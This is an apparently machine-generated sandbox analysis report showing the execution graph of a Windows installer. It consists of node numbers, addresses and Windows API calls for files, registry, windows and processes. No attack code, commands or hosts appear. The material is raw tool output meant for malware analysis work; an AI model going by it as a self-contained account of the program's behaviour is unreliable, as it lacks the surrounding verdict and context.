                                                                                                                      Has exited:false


                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:19.1%
                                                                                                                        Dynamic/Decrypted Code Coverage:13.5%
                                                                                                                        Signature Coverage:18.5%
                                                                                                                        Total number of Nodes:1603
                                                                                                                        Total number of Limit Nodes:40
4929->4934 4949 40399d 4929->4949 4930->4913 4931 4038f0 5050 406521 lstrcpynW 4931->5050 4936 40655e 21 API calls 4934->4936 4992 403bf3 4935->4992 4936->4929 4937 405a75 2 API calls 4937->4949 4938 405acf 2 API calls 4938->4949 4939 4039e7 SetCurrentDirectoryW 4941 4062e1 40 API calls 4939->4941 4940 4039ad GetFileAttributesW 4942 4039b9 DeleteFileW 4940->4942 4940->4949 4944 4039f6 CopyFileW 4941->4944 4942->4949 5056 403b19 4943->5056 4944->4943 4944->4949 4945 405c2d 71 API calls 4945->4949 4946 4062e1 40 API calls 4946->4949 4947 40655e 21 API calls 4947->4949 4949->4929 4949->4934 4949->4937 4949->4938 4949->4939 4949->4940 4949->4943 4949->4945 4949->4946 4949->4947 4950 403a6f CloseHandle 4949->4950 4951 40687e 2 API calls 4949->4951 5053 405b04 CreateProcessW 4949->5053 4950->4943 4951->4949 4952->4880 4953->4882 4955 4067cf 5 API calls 4954->4955 4957 4034d7 4955->4957 4956 4034e1 4956->4888 4957->4956 4958 405df0 3 API calls 4957->4958 4959 4034e9 4958->4959 4960 405acf 2 API calls 4959->4960 4961 4034ef 4960->4961 4962 406040 2 API calls 4961->4962 4963 4034fa 4962->4963 4963->4888 5063 406011 GetFileAttributesW CreateFileW 4964->5063 4966 4030c2 4967 4030d2 4966->4967 5064 406521 lstrcpynW 4966->5064 4967->4895 4969 4030e8 4970 405e3c 2 API calls 4969->4970 4971 4030ee 4970->4971 5065 406521 lstrcpynW 4971->5065 4973 4030f9 GetFileSize 4974 403110 4973->4974 4989 4031f3 4973->4989 4974->4967 4977 40349e ReadFile 4974->4977 4980 40325f 4974->4980 4988 40301e 6 API calls 4974->4988 4974->4989 4976 4031fc 4976->4967 4978 40322c GlobalAlloc 4976->4978 5078 4034b4 SetFilePointer 4976->5078 4977->4974 5077 4034b4 SetFilePointer 4978->5077 4982 40301e 6 API calls 4980->4982 4982->4967 4983 403215 4985 40349e ReadFile 4983->4985 4984 403247 4986 4032b9 39 API calls 4984->4986 4987 403220 4985->4987 4990 403253 4986->4990 4987->4967 4987->4978 4988->4974 5066 40301e 4989->5066 4990->4967 4990->4990 4991 403290 SetFilePointer 4990->4991 4991->4967 4993 406915 5 
API calls 4992->4993 4994 403c07 4993->4994 4995 403c0d 4994->4995 4996 403c1f 4994->4996 5091 406468 wsprintfW 4995->5091 4997 4063ef 3 API calls 4996->4997 4998 403c4f 4997->4998 4999 403c6e lstrcatW 4998->4999 5002 4063ef 3 API calls 4998->5002 5001 403c1d 4999->5001 5083 403ec9 5001->5083 5002->4999 5005 405ef8 18 API calls 5006 403ca0 5005->5006 5007 403d34 5006->5007 5010 4063ef 3 API calls 5006->5010 5008 405ef8 18 API calls 5007->5008 5009 403d3a 5008->5009 5011 403d4a LoadImageW 5009->5011 5013 40655e 21 API calls 5009->5013 5012 403cd2 5010->5012 5014 403df0 5011->5014 5015 403d71 RegisterClassW 5011->5015 5012->5007 5016 403cf3 lstrlenW 5012->5016 5019 405e1d CharNextW 5012->5019 5013->5011 5018 40140b 2 API calls 5014->5018 5017 403da7 SystemParametersInfoW CreateWindowExW 5015->5017 5047 403dfa 5015->5047 5020 403d01 lstrcmpiW 5016->5020 5021 403d27 5016->5021 5017->5014 5024 403df6 5018->5024 5022 403cf0 5019->5022 5020->5021 5023 403d11 GetFileAttributesW 5020->5023 5025 405df0 3 API calls 5021->5025 5022->5016 5026 403d1d 5023->5026 5027 403ec9 22 API calls 5024->5027 5024->5047 5028 403d2d 5025->5028 5026->5021 5029 405e3c 2 API calls 5026->5029 5030 403e07 5027->5030 5092 406521 lstrcpynW 5028->5092 5029->5021 5032 403e13 ShowWindow 5030->5032 5033 403e96 5030->5033 5035 4068a5 3 API calls 5032->5035 5034 405679 5 API calls 5033->5034 5036 403e9c 5034->5036 5037 403e2b 5035->5037 5039 403ea0 5036->5039 5040 403eb8 5036->5040 5038 403e39 GetClassInfoW 5037->5038 5041 4068a5 3 API calls 5037->5041 5043 403e63 DialogBoxParamW 5038->5043 5044 403e4d GetClassInfoW RegisterClassW 5038->5044 5046 40140b 2 API calls 5039->5046 5039->5047 5042 40140b 2 API calls 5040->5042 5041->5038 5042->5047 5045 40140b 2 API calls 5043->5045 5044->5043 5045->5047 5046->5047 5047->4943 5048->4886 5049->4931 5050->4935 5051->4928 5052->4929 5054 405b43 5053->5054 5055 405b37 CloseHandle 5053->5055 5054->4949 5055->5054 5057 403b31 5056->5057 5058 403b23 CloseHandle 
5056->5058 5094 403b5e 5057->5094 5058->5057 5061 405c2d 71 API calls 5062 403a4c OleUninitialize 5061->5062 5062->4906 5062->4907 5063->4966 5064->4969 5065->4973 5067 403027 5066->5067 5068 40303f 5066->5068 5069 403030 DestroyWindow 5067->5069 5070 403037 5067->5070 5071 403047 5068->5071 5072 40304f GetTickCount 5068->5072 5069->5070 5070->4976 5079 406951 5071->5079 5074 403080 5072->5074 5075 40305d CreateDialogParamW ShowWindow 5072->5075 5074->4976 5075->5074 5077->4984 5078->4983 5080 40696e PeekMessageW 5079->5080 5081 406964 DispatchMessageW 5080->5081 5082 40304d 5080->5082 5081->5080 5082->4976 5084 403edd 5083->5084 5093 406468 wsprintfW 5084->5093 5086 403f4e 5087 403f82 22 API calls 5086->5087 5089 403f53 5087->5089 5088 403c7e 5088->5005 5089->5088 5090 40655e 21 API calls 5089->5090 5090->5089 5091->5001 5092->5007 5093->5086 5095 403b6c 5094->5095 5096 403b71 FreeLibrary GlobalFree 5095->5096 5097 403b36 5095->5097 5096->5096 5096->5097 5097->5061 5648 401b7c 5649 402dab 21 API calls 5648->5649 5650 401b83 5649->5650 5651 402d89 21 API calls 5650->5651 5652 401b8c wsprintfW 5651->5652 5653 402c2f 5652->5653 5661 401000 5662 401037 BeginPaint GetClientRect 5661->5662 5663 40100c DefWindowProcW 5661->5663 5664 4010f3 5662->5664 5668 401179 5663->5668 5666 401073 CreateBrushIndirect FillRect DeleteObject 5664->5666 5667 4010fc 5664->5667 5666->5664 5669 401102 CreateFontIndirectW 5667->5669 5670 401167 EndPaint 5667->5670 5669->5670 5671 401112 6 API calls 5669->5671 5670->5668 5671->5670 5672 401680 5673 402dab 21 API calls 5672->5673 5674 401687 5673->5674 5675 402dab 21 API calls 5674->5675 5676 401690 5675->5676 5677 402dab 21 API calls 5676->5677 5678 401699 MoveFileW 5677->5678 5679 4016a5 5678->5679 5680 4016ac 5678->5680 5682 401423 28 API calls 5679->5682 5681 40687e 2 API calls 5680->5681 5684 4022fb 5680->5684 5683 4016bb 5681->5683 5682->5684 5683->5684 5685 4062e1 40 API calls 5683->5685 5685->5679 5686 401503 5687 401508 5686->5687 
5689 401520 5686->5689 5688 402d89 21 API calls 5687->5688 5688->5689 4453 402304 4454 402dab 21 API calls 4453->4454 4455 40230a 4454->4455 4456 402dab 21 API calls 4455->4456 4457 402313 4456->4457 4458 402dab 21 API calls 4457->4458 4459 40231c 4458->4459 4468 40687e FindFirstFileW 4459->4468 4462 402336 lstrlenW lstrlenW 4463 4055a6 28 API calls 4462->4463 4465 402374 SHFileOperationW 4463->4465 4466 402329 4465->4466 4467 402331 4465->4467 4466->4467 4471 4055a6 4466->4471 4469 406894 FindClose 4468->4469 4470 402325 4468->4470 4469->4470 4470->4462 4470->4466 4472 405663 4471->4472 4473 4055c1 4471->4473 4472->4467 4474 4055dd lstrlenW 4473->4474 4475 40655e 21 API calls 4473->4475 4476 405606 4474->4476 4477 4055eb lstrlenW 4474->4477 4475->4474 4479 405619 4476->4479 4480 40560c SetWindowTextW 4476->4480 4477->4472 4478 4055fd lstrcatW 4477->4478 4478->4476 4479->4472 4481 40561f SendMessageW SendMessageW SendMessageW 4479->4481 4480->4479 4481->4472 5690 401a04 5691 402dab 21 API calls 5690->5691 5692 401a0b 5691->5692 5693 402dab 21 API calls 5692->5693 5694 401a14 5693->5694 5695 401a1b lstrcmpiW 5694->5695 5696 401a2d lstrcmpW 5694->5696 5697 401a21 5695->5697 5696->5697 5698 401d86 5699 401d99 GetDlgItem 5698->5699 5700 401d8c 5698->5700 5701 401d93 5699->5701 5702 402d89 21 API calls 5700->5702 5703 401dda GetClientRect LoadImageW SendMessageW 5701->5703 5704 402dab 21 API calls 5701->5704 5702->5701 5706 401e38 5703->5706 5708 401e44 5703->5708 5704->5703 5707 401e3d DeleteObject 5706->5707 5706->5708 5707->5708 5709 402388 5710 40238f 5709->5710 5713 4023a2 5709->5713 5711 40655e 21 API calls 5710->5711 5712 40239c 5711->5712 5712->5713 5714 405b81 MessageBoxIndirectW 5712->5714 5714->5713 5715 402c0a SendMessageW 5716 402c24 InvalidateRect 5715->5716 5717 402c2f 5715->5717 5716->5717 5725 404f0d GetDlgItem GetDlgItem 5726 404f5f 7 API calls 5725->5726 5738 405184 5725->5738 5727 405006 DeleteObject 5726->5727 5728 404ff9 SendMessageW 5726->5728 
5729 40500f 5727->5729 5728->5727 5731 405046 5729->5731 5732 40655e 21 API calls 5729->5732 5730 405266 5734 405312 5730->5734 5740 405177 5730->5740 5745 4052bf SendMessageW 5730->5745 5733 4044a0 22 API calls 5731->5733 5737 405028 SendMessageW SendMessageW 5732->5737 5739 40505a 5733->5739 5735 405324 5734->5735 5736 40531c SendMessageW 5734->5736 5747 405336 ImageList_Destroy 5735->5747 5748 40533d 5735->5748 5756 40534d 5735->5756 5736->5735 5737->5729 5738->5730 5759 4051f3 5738->5759 5779 404e5b SendMessageW 5738->5779 5744 4044a0 22 API calls 5739->5744 5742 404507 8 API calls 5740->5742 5741 405258 SendMessageW 5741->5730 5746 405513 5742->5746 5760 40506b 5744->5760 5745->5740 5750 4052d4 SendMessageW 5745->5750 5747->5748 5751 405346 GlobalFree 5748->5751 5748->5756 5749 4054c7 5749->5740 5754 4054d9 ShowWindow GetDlgItem ShowWindow 5749->5754 5753 4052e7 5750->5753 5751->5756 5752 405146 GetWindowLongW SetWindowLongW 5755 40515f 5752->5755 5761 4052f8 SendMessageW 5753->5761 5754->5740 5757 405164 ShowWindow 5755->5757 5758 40517c 5755->5758 5756->5749 5772 405388 5756->5772 5784 404edb 5756->5784 5777 4044d5 SendMessageW 5757->5777 5778 4044d5 SendMessageW 5758->5778 5759->5730 5759->5741 5760->5752 5762 405141 5760->5762 5765 4050be SendMessageW 5760->5765 5766 405110 SendMessageW 5760->5766 5767 4050fc SendMessageW 5760->5767 5761->5734 5762->5752 5762->5755 5765->5760 5766->5760 5767->5760 5769 405492 5770 40549d InvalidateRect 5769->5770 5773 4054a9 5769->5773 5770->5773 5771 4053b6 SendMessageW 5775 4053cc 5771->5775 5772->5771 5772->5775 5773->5749 5793 404e16 5773->5793 5774 405440 SendMessageW SendMessageW 5774->5775 5775->5769 5775->5774 5777->5740 5778->5738 5780 404eba SendMessageW 5779->5780 5781 404e7e GetMessagePos ScreenToClient SendMessageW 5779->5781 5782 404eb2 5780->5782 5781->5782 5783 404eb7 5781->5783 5782->5759 5783->5780 5796 406521 lstrcpynW 5784->5796 5786 404eee 5797 406468 wsprintfW 5786->5797 5788 404ef8 5789 40140b 2 API 
calls 5788->5789 5790 404f01 5789->5790 5798 406521 lstrcpynW 5790->5798 5792 404f08 5792->5772 5799 404d4d 5793->5799 5795 404e2b 5795->5749 5796->5786 5797->5788 5798->5792 5800 404d66 5799->5800 5801 40655e 21 API calls 5800->5801 5802 404dca 5801->5802 5803 40655e 21 API calls 5802->5803 5804 404dd5 5803->5804 5805 40655e 21 API calls 5804->5805 5806 404deb lstrlenW wsprintfW SetDlgItemTextW 5805->5806 5806->5795 5807 40248f 5808 402dab 21 API calls 5807->5808 5809 4024a1 5808->5809 5810 402dab 21 API calls 5809->5810 5811 4024ab 5810->5811 5824 402e3b 5811->5824 5814 402c2f 5815 4024e3 5817 4024ef 5815->5817 5819 402d89 21 API calls 5815->5819 5816 402dab 21 API calls 5818 4024d9 lstrlenW 5816->5818 5820 40250e RegSetValueExW 5817->5820 5821 4032b9 39 API calls 5817->5821 5818->5815 5819->5817 5822 402524 RegCloseKey 5820->5822 5821->5820 5822->5814 5825 402e56 5824->5825 5828 4063bc 5825->5828 5829 4063cb 5828->5829 5830 4024bb 5829->5830 5831 4063d6 RegCreateKeyExW 5829->5831 5830->5814 5830->5815 5830->5816 5831->5830 5832 404610 lstrlenW 5833 404631 WideCharToMultiByte 5832->5833 5834 40462f 5832->5834 5834->5833 5835 402910 5836 402dab 21 API calls 5835->5836 5837 402917 FindFirstFileW 5836->5837 5838 40293f 5837->5838 5841 40292a 5837->5841 5839 402948 5838->5839 5843 406468 wsprintfW 5838->5843 5844 406521 lstrcpynW 5839->5844 5843->5839 5844->5841 5845 401911 5846 401948 5845->5846 5847 402dab 21 API calls 5846->5847 5848 40194d 5847->5848 5849 405c2d 71 API calls 5848->5849 5850 401956 5849->5850 5851 401491 5852 4055a6 28 API calls 5851->5852 5853 401498 5852->5853 5854 404991 5855 4049bd 5854->5855 5856 4049ce 5854->5856 5915 405b65 GetDlgItemTextW 5855->5915 5858 4049da GetDlgItem 5856->5858 5864 404a39 5856->5864 5861 4049ee 5858->5861 5859 404b1d 5913 404ccc 5859->5913 5917 405b65 GetDlgItemTextW 5859->5917 5860 4049c8 5862 4067cf 5 API calls 5860->5862 5863 404a02 SetWindowTextW 5861->5863 5866 405e9b 4 API calls 5861->5866 5862->5856 5867 
4044a0 22 API calls 5863->5867 5864->5859 5868 40655e 21 API calls 5864->5868 5864->5913 5872 4049f8 5866->5872 5873 404a1e 5867->5873 5874 404aad SHBrowseForFolderW 5868->5874 5869 404b4d 5875 405ef8 18 API calls 5869->5875 5870 404507 8 API calls 5871 404ce0 5870->5871 5872->5863 5879 405df0 3 API calls 5872->5879 5876 4044a0 22 API calls 5873->5876 5874->5859 5877 404ac5 CoTaskMemFree 5874->5877 5878 404b53 5875->5878 5880 404a2c 5876->5880 5881 405df0 3 API calls 5877->5881 5918 406521 lstrcpynW 5878->5918 5879->5863 5916 4044d5 SendMessageW 5880->5916 5883 404ad2 5881->5883 5886 404b09 SetDlgItemTextW 5883->5886 5890 40655e 21 API calls 5883->5890 5885 404a32 5888 406915 5 API calls 5885->5888 5886->5859 5887 404b6a 5889 406915 5 API calls 5887->5889 5888->5864 5896 404b71 5889->5896 5891 404af1 lstrcmpiW 5890->5891 5891->5886 5894 404b02 lstrcatW 5891->5894 5892 404bb2 5919 406521 lstrcpynW 5892->5919 5894->5886 5895 404bb9 5897 405e9b 4 API calls 5895->5897 5896->5892 5900 405e3c 2 API calls 5896->5900 5902 404c0a 5896->5902 5898 404bbf GetDiskFreeSpaceW 5897->5898 5901 404be3 MulDiv 5898->5901 5898->5902 5900->5896 5901->5902 5903 404c7b 5902->5903 5904 404e16 24 API calls 5902->5904 5905 40140b 2 API calls 5903->5905 5906 404c9e 5903->5906 5907 404c68 5904->5907 5905->5906 5920 4044c2 KiUserCallbackDispatcher 5906->5920 5909 404c7d SetDlgItemTextW 5907->5909 5910 404c6d 5907->5910 5909->5903 5912 404d4d 24 API calls 5910->5912 5911 404cba 5911->5913 5914 4048ea SendMessageW 5911->5914 5912->5903 5913->5870 5914->5913 5915->5860 5916->5885 5917->5869 5918->5887 5919->5895 5920->5911 5921 7059170d 5922 705915b6 GlobalFree 5921->5922 5924 70591725 5922->5924 5923 7059176b GlobalFree 5924->5923 5925 70591740 5924->5925 5926 70591757 VirtualFree 5924->5926 5925->5923 5926->5923 5927 401914 5928 402dab 21 API calls 5927->5928 5929 40191b 5928->5929 5930 405b81 MessageBoxIndirectW 5929->5930 5931 401924 5930->5931 4815 402896 4816 40289d 4815->4816 4819 402bae 
4815->4819 4817 402d89 21 API calls 4816->4817 4818 4028a4 4817->4818 4820 4028b3 SetFilePointer 4818->4820 4820->4819 4821 4028c3 4820->4821 4823 406468 wsprintfW 4821->4823 4823->4819 5932 401f17 5933 402dab 21 API calls 5932->5933 5934 401f1d 5933->5934 5935 402dab 21 API calls 5934->5935 5936 401f26 5935->5936 5937 402dab 21 API calls 5936->5937 5938 401f2f 5937->5938 5939 402dab 21 API calls 5938->5939 5940 401f38 5939->5940 5941 401423 28 API calls 5940->5941 5942 401f3f 5941->5942 5949 405b47 ShellExecuteExW 5942->5949 5944 401f87 5946 402933 5944->5946 5950 4069c0 WaitForSingleObject 5944->5950 5947 401fa4 CloseHandle 5947->5946 5949->5944 5951 4069da 5950->5951 5952 4069ec GetExitCodeProcess 5951->5952 5953 406951 2 API calls 5951->5953 5952->5947 5954 4069e1 WaitForSingleObject 5953->5954 5954->5951 5955 402f98 5956 402fc3 5955->5956 5957 402faa SetTimer 5955->5957 5958 403018 5956->5958 5959 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5956->5959 5957->5956 5959->5958 5960 70591000 5963 7059101b 5960->5963 5964 705915b6 GlobalFree 5963->5964 5965 70591020 5964->5965 5966 70591027 GlobalAlloc 5965->5966 5967 70591024 5965->5967 5966->5967 5968 705915dd 3 API calls 5967->5968 5969 70591019 5968->5969 5970 40551a 5971 40552a 5970->5971 5972 40553e 5970->5972 5973 405530 5971->5973 5982 405587 5971->5982 5974 405546 IsWindowVisible 5972->5974 5980 40555d 5972->5980 5977 4044ec SendMessageW 5973->5977 5975 405553 5974->5975 5974->5982 5978 404e5b 5 API calls 5975->5978 5976 40558c CallWindowProcW 5979 40553a 5976->5979 5977->5979 5978->5980 5980->5976 5981 404edb 4 API calls 5980->5981 5981->5982 5982->5976 5983 401d1c 5984 402d89 21 API calls 5983->5984 5985 401d22 IsWindow 5984->5985 5986 401a25 5985->5986 5987 40149e 5988 4023a2 5987->5988 5989 4014ac PostQuitMessage 5987->5989 5989->5988 4222 401ba0 4223 401bf1 4222->4223 4224 401bad 4222->4224 4225 401c1b GlobalAlloc 4223->4225 4228 401bf6 4223->4228 4229 401c36 4224->4229 4230 401bc4 
4224->4230 4241 40655e 4225->4241 4227 40655e 21 API calls 4231 40239c 4227->4231 4236 4023a2 4228->4236 4260 406521 lstrcpynW 4228->4260 4229->4227 4229->4236 4258 406521 lstrcpynW 4230->4258 4231->4236 4261 405b81 4231->4261 4233 401c08 GlobalFree 4233->4236 4235 401bd3 4259 406521 lstrcpynW 4235->4259 4239 401be2 4265 406521 lstrcpynW 4239->4265 4256 406569 4241->4256 4242 4067b0 4243 4067c9 4242->4243 4288 406521 lstrcpynW 4242->4288 4243->4229 4245 406781 lstrlenW 4245->4256 4249 40667a GetSystemDirectoryW 4249->4256 4250 40655e 15 API calls 4250->4245 4251 406690 GetWindowsDirectoryW 4251->4256 4253 40655e 15 API calls 4253->4256 4254 406722 lstrcatW 4254->4256 4256->4242 4256->4245 4256->4249 4256->4250 4256->4251 4256->4253 4256->4254 4257 4066f2 SHGetPathFromIDListW CoTaskMemFree 4256->4257 4266 4063ef 4256->4266 4271 406915 GetModuleHandleA 4256->4271 4277 4067cf 4256->4277 4286 406468 wsprintfW 4256->4286 4287 406521 lstrcpynW 4256->4287 4257->4256 4258->4235 4259->4239 4260->4233 4262 405b96 4261->4262 4263 405baa MessageBoxIndirectW 4262->4263 4264 405be2 4262->4264 4263->4264 4264->4236 4265->4236 4289 40638e 4266->4289 4269 406423 RegQueryValueExW RegCloseKey 4270 406453 4269->4270 4270->4256 4272 406931 4271->4272 4273 40693b GetProcAddress 4271->4273 4293 4068a5 GetSystemDirectoryW 4272->4293 4275 40694a 4273->4275 4275->4256 4276 406937 4276->4273 4276->4275 4284 4067dc 4277->4284 4278 406852 4279 406857 CharPrevW 4278->4279 4281 406878 4278->4281 4279->4278 4280 406845 CharNextW 4280->4278 4280->4284 4281->4256 4283 406831 CharNextW 4283->4284 4284->4278 4284->4280 4284->4283 4285 406840 CharNextW 4284->4285 4296 405e1d 4284->4296 4285->4280 4286->4256 4287->4256 4288->4243 4290 40639d 4289->4290 4291 4063a1 4290->4291 4292 4063a6 RegOpenKeyExW 4290->4292 4291->4269 4291->4270 4292->4291 4294 4068c7 wsprintfW LoadLibraryExW 4293->4294 4294->4276 4297 405e23 4296->4297 4298 405e39 4297->4298 4299 405e2a CharNextW 4297->4299 4298->4284 4299->4297 
4316 403fa1 4317 403fb9 4316->4317 4318 40411a 4316->4318 4317->4318 4319 403fc5 4317->4319 4320 40416b 4318->4320 4321 40412b GetDlgItem GetDlgItem 4318->4321 4323 403fd0 SetWindowPos 4319->4323 4324 403fe3 4319->4324 4322 4041c5 4320->4322 4330 401389 2 API calls 4320->4330 4325 4044a0 22 API calls 4321->4325 4343 404115 4322->4343 4389 4044ec 4322->4389 4323->4324 4327 403fec ShowWindow 4324->4327 4328 40402e 4324->4328 4329 404155 SetClassLongW 4325->4329 4331 404107 4327->4331 4332 40400c GetWindowLongW 4327->4332 4333 404036 DestroyWindow 4328->4333 4334 40404d 4328->4334 4335 40140b 2 API calls 4329->4335 4338 40419d 4330->4338 4411 404507 4331->4411 4332->4331 4340 404025 ShowWindow 4332->4340 4388 404429 4333->4388 4336 404052 SetWindowLongW 4334->4336 4337 404063 4334->4337 4335->4320 4336->4343 4337->4331 4341 40406f GetDlgItem 4337->4341 4338->4322 4342 4041a1 SendMessageW 4338->4342 4340->4328 4346 404080 SendMessageW IsWindowEnabled 4341->4346 4349 40409d 4341->4349 4342->4343 4344 40140b 2 API calls 4379 4041d7 4344->4379 4345 40442b DestroyWindow EndDialog 4345->4388 4346->4343 4346->4349 4347 40445a ShowWindow 4347->4343 4348 40655e 21 API calls 4348->4379 4350 4040aa 4349->4350 4352 4040f1 SendMessageW 4349->4352 4353 4040bd 4349->4353 4361 4040a2 4349->4361 4350->4352 4350->4361 4352->4331 4355 4040c5 4353->4355 4356 4040da 4353->4356 4354 4040d8 4354->4331 4405 40140b 4355->4405 4358 40140b 2 API calls 4356->4358 4357 4044a0 22 API calls 4357->4379 4360 4040e1 4358->4360 4360->4331 4360->4361 4408 404479 4361->4408 4363 404252 GetDlgItem 4364 404267 4363->4364 4365 40426f ShowWindow KiUserCallbackDispatcher 4363->4365 4364->4365 4395 4044c2 KiUserCallbackDispatcher 4365->4395 4367 404299 EnableWindow 4372 4042ad 4367->4372 4368 4042b2 GetSystemMenu EnableMenuItem SendMessageW 4369 4042e2 SendMessageW 4368->4369 4368->4372 4369->4372 4372->4368 4396 4044d5 SendMessageW 4372->4396 4397 403f82 4372->4397 4400 406521 lstrcpynW 4372->4400 4374 404311 
lstrlenW 4375 40655e 21 API calls 4374->4375 4376 404327 SetWindowTextW 4375->4376 4401 401389 4376->4401 4378 40436b DestroyWindow 4380 404385 CreateDialogParamW 4378->4380 4378->4388 4379->4343 4379->4344 4379->4345 4379->4348 4379->4357 4379->4378 4392 4044a0 4379->4392 4381 4043b8 4380->4381 4380->4388 4382 4044a0 22 API calls 4381->4382 4383 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4382->4383 4384 401389 2 API calls 4383->4384 4385 404409 4384->4385 4385->4343 4386 404411 ShowWindow 4385->4386 4387 4044ec SendMessageW 4386->4387 4387->4388 4388->4343 4388->4347 4390 404504 4389->4390 4391 4044f5 SendMessageW 4389->4391 4390->4379 4391->4390 4393 40655e 21 API calls 4392->4393 4394 4044ab SetDlgItemTextW 4393->4394 4394->4363 4395->4367 4396->4372 4398 40655e 21 API calls 4397->4398 4399 403f90 SetWindowTextW 4398->4399 4399->4372 4400->4374 4403 401390 4401->4403 4402 4013fe 4402->4379 4403->4402 4404 4013cb MulDiv SendMessageW 4403->4404 4404->4403 4406 401389 2 API calls 4405->4406 4407 401420 4406->4407 4407->4361 4409 404480 4408->4409 4410 404486 SendMessageW 4408->4410 4409->4410 4410->4354 4412 4045ca 4411->4412 4413 40451f GetWindowLongW 4411->4413 4412->4343 4413->4412 4414 404534 4413->4414 4414->4412 4415 404561 GetSysColor 4414->4415 4416 404564 4414->4416 4415->4416 4417 404574 SetBkMode 4416->4417 4418 40456a SetTextColor 4416->4418 4419 404592 4417->4419 4420 40458c GetSysColor 4417->4420 4418->4417 4421 4045a3 4419->4421 4422 404599 SetBkColor 4419->4422 4420->4419 4421->4412 4423 4045b6 DeleteObject 4421->4423 4424 4045bd CreateBrushIndirect 4421->4424 4422->4421 4423->4424 4424->4412 5990 402621 5991 402dab 21 API calls 5990->5991 5992 402628 5991->5992 5995 406011 GetFileAttributesW CreateFileW 5992->5995 5994 402634 5995->5994 4436 4025a3 4448 402deb 4436->4448 4439 402d89 21 API calls 4440 4025b6 4439->4440 4441 4025c5 4440->4441 4446 402933 4440->4446 4442 4025d2 RegEnumKeyW 4441->4442 4443 4025de RegEnumValueW 
4441->4443 4444 4025fa RegCloseKey 4442->4444 4443->4444 4445 4025f3 4443->4445 4444->4446 4445->4444 4449 402dab 21 API calls 4448->4449 4450 402e02 4449->4450 4451 40638e RegOpenKeyExW 4450->4451 4452 4025ad 4451->4452 4452->4439 6003 7059103d 6004 7059101b 5 API calls 6003->6004 6005 70591056 6004->6005 4701 4015a8 4702 402dab 21 API calls 4701->4702 4703 4015af SetFileAttributesW 4702->4703 4704 4015c1 4703->4704 6006 401fa9 6007 402dab 21 API calls 6006->6007 6008 401faf 6007->6008 6009 4055a6 28 API calls 6008->6009 6010 401fb9 6009->6010 6011 405b04 2 API calls 6010->6011 6012 401fbf 6011->6012 6013 4069c0 5 API calls 6012->6013 6015 402933 6012->6015 6016 401fe2 CloseHandle 6012->6016 6017 401fd4 6013->6017 6016->6015 6017->6016 6019 406468 wsprintfW 6017->6019 6019->6016 4705 40252f 4706 402deb 21 API calls 4705->4706 4707 402539 4706->4707 4708 402dab 21 API calls 4707->4708 4709 402542 4708->4709 4710 40254d RegQueryValueExW 4709->4710 4713 402933 4709->4713 4711 40256d 4710->4711 4715 402573 RegCloseKey 4710->4715 4711->4715 4716 406468 wsprintfW 4711->4716 4715->4713 4716->4715 6020 40202f 6021 402dab 21 API calls 6020->6021 6022 402036 6021->6022 6023 406915 5 API calls 6022->6023 6024 402045 6023->6024 6025 402061 GlobalAlloc 6024->6025 6026 4020d1 6024->6026 6025->6026 6027 402075 6025->6027 6028 406915 5 API calls 6027->6028 6029 40207c 6028->6029 6030 406915 5 API calls 6029->6030 6031 402086 6030->6031 6031->6026 6035 406468 wsprintfW 6031->6035 6033 4020bf 6036 406468 wsprintfW 6033->6036 6035->6033 6036->6026 6037 4021af 6038 402dab 21 API calls 6037->6038 6039 4021b6 6038->6039 6040 402dab 21 API calls 6039->6040 6041 4021c0 6040->6041 6042 402dab 21 API calls 6041->6042 6043 4021ca 6042->6043 6044 402dab 21 API calls 6043->6044 6045 4021d4 6044->6045 6046 402dab 21 API calls 6045->6046 6047 4021de 6046->6047 6048 40221d CoCreateInstance 6047->6048 6049 402dab 21 API calls 6047->6049 6052 40223c 6048->6052 6049->6048 6050 401423 28 API calls 
6051 4022fb 6050->6051 6052->6050 6052->6051 6053 403bb1 6054 403bbc 6053->6054 6055 403bc0 6054->6055 6056 403bc3 GlobalAlloc 6054->6056 6056->6055 6064 401a35 6065 402dab 21 API calls 6064->6065 6066 401a3e ExpandEnvironmentStringsW 6065->6066 6067 401a52 6066->6067 6069 401a65 6066->6069 6068 401a57 lstrcmpW 6067->6068 6067->6069 6068->6069 6075 4023b7 6076 4023c5 6075->6076 6077 4023bf 6075->6077 6079 402dab 21 API calls 6076->6079 6080 4023d3 6076->6080 6078 402dab 21 API calls 6077->6078 6078->6076 6079->6080 6081 402dab 21 API calls 6080->6081 6083 4023e1 6080->6083 6081->6083 6082 402dab 21 API calls 6084 4023ea WritePrivateProfileStringW 6082->6084 6083->6082 6085 4014b8 6086 4014be 6085->6086 6087 401389 2 API calls 6086->6087 6088 4014c6 6087->6088 4829 402439 4830 402441 4829->4830 4831 40246c 4829->4831 4832 402deb 21 API calls 4830->4832 4833 402dab 21 API calls 4831->4833 4834 402448 4832->4834 4835 402473 4833->4835 4836 402452 4834->4836 4840 402480 4834->4840 4841 402e69 4835->4841 4838 402dab 21 API calls 4836->4838 4839 402459 RegDeleteValueW RegCloseKey 4838->4839 4839->4840 4842 402e7d 4841->4842 4844 402e76 4841->4844 4842->4844 4845 402eae 4842->4845 4844->4840 4846 40638e RegOpenKeyExW 4845->4846 4847 402edc 4846->4847 4848 402f91 4847->4848 4849 402ee6 4847->4849 4848->4844 4850 402eec RegEnumValueW 4849->4850 4855 402f0f 4849->4855 4851 402f76 RegCloseKey 4850->4851 4850->4855 4851->4848 4852 402f4b RegEnumKeyW 4853 402f54 RegCloseKey 4852->4853 4852->4855 4854 406915 5 API calls 4853->4854 4856 402f64 4854->4856 4855->4851 4855->4852 4855->4853 4857 402eae 6 API calls 4855->4857 4858 402f86 4856->4858 4859 402f68 RegDeleteKeyW 4856->4859 4857->4855 4858->4848 4859->4848 4860 40173a 4861 402dab 21 API calls 4860->4861 4862 401741 SearchPathW 4861->4862 4863 40175c 4862->4863 6089 401d3d 6090 402d89 21 API calls 6089->6090 6091 401d44 6090->6091 6092 402d89 21 API calls 6091->6092 6093 401d50 GetDlgItem 6092->6093 6094 40263d 6093->6094 
6095 406c3f 6097 406ac3 6095->6097 6096 40742e 6097->6096 6098 406b44 GlobalFree 6097->6098 6099 406b4d GlobalAlloc 6097->6099 6100 406bc4 GlobalAlloc 6097->6100 6101 406bbb GlobalFree 6097->6101 6098->6099 6099->6096 6099->6097 6100->6096 6100->6097 6101->6100

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        APIs
